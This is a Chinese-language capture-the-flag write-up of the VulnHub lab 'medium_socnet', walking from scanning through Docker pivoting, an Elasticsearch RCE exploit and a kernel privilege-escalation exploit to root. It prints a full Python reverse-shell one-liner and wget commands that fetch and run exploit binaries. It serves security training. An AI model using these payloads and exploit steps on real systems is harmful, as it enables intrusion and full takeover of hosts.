打靶笔记--medium_socnet

medium_socnet

靶机地址:https://www.vulnhub.com/entry/boredhackerblog-social-network,454/

内容简介:

这是本系列的第04次打靶,我选择了一个中等难度的靶机。在这次打靶过程中,我们将使用到以下攻击手段:

主机发现

端口扫描

服务发现

路径爬取

代码注入

Shell脚本

内网信息收集

内网穿透

漏洞利用

密码破解

本地提权

攻击代码修改

打靶过程:

arp-scan -l   //主机发现192.168.2.19为靶机

对ip进行扫描,扫描发现开启22,5000端口

Nmap -p- 192.168.2.19

对端口进行服务扫描

Nmap -p22,5000 -sV 192.168.2.19

22端口是ssh服务,5000是http服务,访问5000端口

既然是web网站,那肯定要浏览器访问看看,这个靶场开放的web页面非常的简单,只有一个类似于评论的输入框,这种地方可以考虑试一下xss,或者是sql注入,经过简单的测试,并没有成功,然后考虑继续做其他的信息收集,之后如果实在没有突破点,再来尝试此处。

使用dirsearch进行路径爆破,发现一个/admin路径

Dirsearch -u http://192..168.2.19:5000

访问/admin这个路径,发现这是一个代码执行页面

代码注入

使用python反弹shell代码将ip和端口改为kali的,并再kali进行监听

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.14",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

反弹成功ls看一下路径,id 看一下权限,直接是root权限??细看一下存在一个Dockerfile文件这应该是一个docker容器的root权限

为了进一步确认是否是docker容器,有两种方法第一种查看根目录下是否有/.dockerenv

第二种方法cat /proc/1/cgroup查看是否存在docker的哈希值,验证发现这就是一个docker容器

那么就要从docker容器中突破出来,先查看docker的ip,172.17.0.3

 

在内网进行主机发现最简单的方法就是进行ping,内网的网段地址段很大,手工ping效率太低所以使用脚本进行,这就不扫描65535个了就扫10个

for i in $(seq 1 10); do ping -c 1 172.17.0.$i; done

经扫描发现172.17.0.1和172.17.0.2两个网段回包了,因为172是内网网段,所以要通过隧道攻击,这里使用的Venom

现在服务端启动监听

./admin_linux_x64 -lport 9999

客户端需要下载,进入到客户端所在的目录,在kali启动一个http服务

Wget去访问下载客户端

Wget http://192.168..14:80/agent_linux_x64

查看一下已经存在,赋予可执行权限

Chmod +x agent_linux_x64

启动客户端

./agent_linux_x64 -rhost 192.168.2.14 -rport 9999

服务端已经监听到了

Show //查看一下节点

Goto 1 //进入节点1

Socks 1080  //设置一个socks代理

设置配置文件,将最底部改为socks5 127.0.0.1 1080

vi /etc/proxychains4.conf

这样就可以使用kali上的扫描工具对内网进行扫描了

proxychains nmap -Pn -sT 172.17.0.1

扫描发现两个端口22,5000

继续对服务版本进行扫描

proxychains nmap -P22,5000 -sV -Pn -sT 172.17.0.1

既然也存在http服务那就访问一下,这里需要修改浏览器的代理,改为刚才设置的socks的代理

访问之后和另一个页面是一样的,说明这个ip是目标的宿主机

接下来对172.17.0.2进行扫描

proxychains nmap -Pn -sT 172.17.0.2

扫描只发现了一个9200端口

对9200进行版本扫描

proxychains nmap -p9200 -sV -Pn -sT 172.17.0.2

扫描发现是Elasticsearch服务版本是1.4.2,Elasticsearch历史版本出现过RCE远程代码执行漏洞,那么会不会存在漏洞呢,kali中存在很多漏洞利用代码。

使用kali搜索一下

searchsploit elasticsearch

前两个是RCE远程代码执行的代码,可以挨个试一下

拷贝一下这个文件

cp /usr/share/exploitdb/exploits/linux/remote/36337.py .

查看代码是用python2来写的那么直接用python2来调用,id发现又获得一个root权限

proxychains python2 36337.py 172.17.0.2

根目录下存在一个password文件

查看一下这个文件获得了密码和用户名,密码是哈希值那么就破解一下(MD5)。

试想一下这个账号和密码是用来登录什么的呢,目前只有一个ssh可以尝试一下

登录ssh试一下账号john,密码是1337hack竟然登录成功了

Ssh john@192.168.2.19

查看一下权限,尝试一下能不能直接sudo -s提升为root权限,发现不行没有sudo权限

那么怎么才能提升权限呢?查看一下内核是3.13的古老内核,可以尝试一下内核提取

搜索一下

searchsploit linux 3.13  

从中随便挑选一个,拷贝下来,然后查看一下这个文件

cp /usr/share/exploitdb/exploits/linux/local/37292.c .

Vi 37292.c

查看得知这是一个C语言的源码,需要执行先要进行编译使用gcc进行编译,编译之后进行执行。可是在宿主机上没有安装gcc

因此我对源码进行了修改,删除调用gcc的部分源代码后进行编译

修改后在对源码进行编译,编译过程会报错但是并不影响输出结果

Gcc -o exp 37292.c

查看源码是发现还需要一个二进制文件ofs-lib.so,找到源代码中调用gcc编译的那个源代码文件的编译好的文件

Locate ofs-lib.so

将这个文件拷贝到当前目录下

cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so .

启动http服务

Python3 -m http.server 80

Wget http://192.168.2.14/exp

Wget http://192.168.2.14/ofs-lib.so

将两个文件下载下来

赋予可执行权限

Chmod +x exp

为了执行效果的成功,把这两个文件拷贝到目标靶机的tmp目录下,进入tmp目录

Mv * /tmp/

执行exp成功获取root权限

总结:面对靶机,先进行了主机发现,之后针对已经发现的主机进行了端口扫描以及服务的扫描,当扫描结束之后,发现目标主机存在5000端口的web应用,尝试访问web应用,在web应用下没有收获任何漏洞,之后对web应用进行路径发现,发现了一个/admin的后台页面,在该后台地址发现了远程代码执行漏洞,利用反弹shell获取到了一个root权限,但是该root权限是一个容器系统,然后基于该容器系统对其内网的Ip地址段进行发现,发现过程中,识别出两个内网主机的IP地址,之后挂取代理进行内网穿透,对这两个地址进行全端口扫描,在扫描过程中,发现了在一台主机上发现了9000端口,该端口是Elasticserch的默认端口,又都Elasticserch进行漏洞的利用和攻击,成功拿下了172.17.0.2这台主机,在这台主机中发现了passwords这个文件,对其进行解密后,利用发现的用户名和密码对目标主机进行尝试登录,登录后发现只是一个普通用户权限,因目标主机使用的是内核较老的linux发行版,所以此时使用最直接的提权方法:针对内核的提权。但是漏洞利用代码无法直接在目标系统进行gcc的编译,所以只能修改代码,重新编译,然后将编译后的代码和库文件一起传输的目标系统,然后进行提权,获取到root权限

扫描发现5000端口 -> 服务探测发现web服务 -> 网站路径扫描发现管理页面 -> 利用代码执行获取shell -> 判断docker容器 -> 做内网穿透开始探测内网 -> 发现同网段docker容器漏洞并利用获取shell -> 信息收集找到普通用户密码 -> 在线网站密码破解登录靶机ssh服务 -> 最后利用提权exp成功获得root权限

  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值